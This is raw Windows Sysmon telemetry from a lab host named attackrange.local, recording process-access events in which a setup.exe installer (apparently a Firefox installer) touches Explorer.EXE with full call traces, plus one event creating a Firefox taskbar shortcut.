13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000016593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000016589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000016586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000016585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk2021-01-18 13:59:54.333 10341000x800000000000000016584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Windows\System32\SHELL32.dll+47577a(wow64)|C:\Windows\System32\SHELL32.dll+472508(wow64) 10341000x800000000000000016583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Windows\System32\SHELL32.dll+47577a(wow64)|C:\Windows\System32\SHELL32.dll+472508(wow64) 10341000x800000000000000016582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.239{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 